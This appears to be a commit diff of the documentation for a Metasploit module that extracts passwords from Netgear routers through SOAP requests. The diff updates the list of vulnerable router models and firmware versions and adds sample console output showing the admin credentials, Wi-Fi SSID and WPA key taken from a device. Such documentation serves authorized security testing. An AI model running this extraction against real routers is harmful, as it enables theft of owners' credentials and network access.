1
1
## Vulnerable Application
2
2
3
3
The following list is a non-exhaustive list of vulnerable Netgear devices:
4
- 1 . R6300v2 - V1.0.3.8
5
- 2 . WNDR3300 - V1.0.45
6
- 3 . WNDR3700v1 - V1.0.7.98
7
- 4 . WNDR3700v1 - V1.0.16.98
8
- 5 . WNDR3700v2 - V1.0.1.14
9
- 6 . WNDR3700v4 - V1.0.1.42
10
- 7 . WNDR3700v4 - V1.0.0.4SH
11
- 8 . WNDR3700v4 - V1.0.1.52
12
- 9 . WNDR3800 - V1.0.0.48
13
- 10 . WNDR4300 - V1.0.1.60
14
- 11 . WNR1000v2 - V1.0.1.1
15
- 12 . WNR1000v2 - V1.1.2.58
16
- 13 . WNR2000v3 - v1.1.2.10
17
- 14 . WNR2200 - V1.0.1.88
18
- 15 . WNR2500 - V1.0.0.24
4
+ 1 . R6300v2 < [ 1.0.3.28] ( http://kb.netgear.com/app/answers/detail/a_id/28372 )
5
+ 2 . WNDR3300 - V1.0.45 (current, confirmed vuln)
6
+ 3 . WNDR3700v1 - 1.0.7.98, 1.0.16.98 (confirmed vuln)
7
+ 4 . WNDR3700v2 - 1.0.1.14 (EOL, confirmed vuln)
8
+ 5 . WNDR3700v4 < [ 1.0.2.80] ( http://kb.netgear.com/app/answers/detail/a_id/28355 )
9
+ 6 . WNDR3800 - 1.0.0.48 (EOL, confirmed vuln)
10
+ 7 . WNDR4300 < [ 1.0.2.80] ( http://kb.netgear.com/app/answers/detail/a_id/28037 )
11
+ 8 . WNR1000v2 - 1.0.1.1, 1.1.2.58 (EOL, confirmed vuln)
12
+ 9 . WNR2000v3 < [ 1.1.2.12] ( http://kb.netgear.com/app/answers/detail/a_id/30024 )
13
+ 10 . WNR2200 < [ 1.0.1.96] ( http://kb.netgear.com/app/answers/detail/a_id/28036 )
14
+ 11 . WNR2500 < [ 1.0.0.32] ( http://kb.netgear.com/app/answers/detail/a_id/28351 )
19
15
20
16
## Verification Steps
21
17
@@ -39,11 +35,15 @@ msf auxiliary(netgear_soap_password_extractor) > run
39
35
[*] Extracting Firmware version...
40
36
[+] Model wnr2000v3 found
41
37
[+] Firmware version V1.1.2.10 found
42
- [+] Device details downloaded to: /root/.msf4/loot/20160701181449_default_192 .168.1.1_netgear_soap_dev_668524 .txt
38
+ [+] Device details downloaded to: /root/.msf4/loot/20160706212637_default_192 .168.1.1_netgear_soap_dev_000157 .txt
43
39
[*] Extracting credentials...
44
40
[*] Credentials found, extracting...
45
41
[+] admin / password credentials found
46
- [+] Account details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_acc_252579.txt
42
+ [+] Account details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_acc_387111.txt
43
+ [*] Extracting Wifi...
44
+ [+] Wifi SSID: NETGEAR44
45
+ [+] Wifi Encryption: WPA2-PSK
46
+ [*] Extracting WPA Keys...
47
+ [+] Wifi Password: netgearpassword22
47
48
[*] Auxiliary module execution completed
48
-
49
49
```
0 commit comments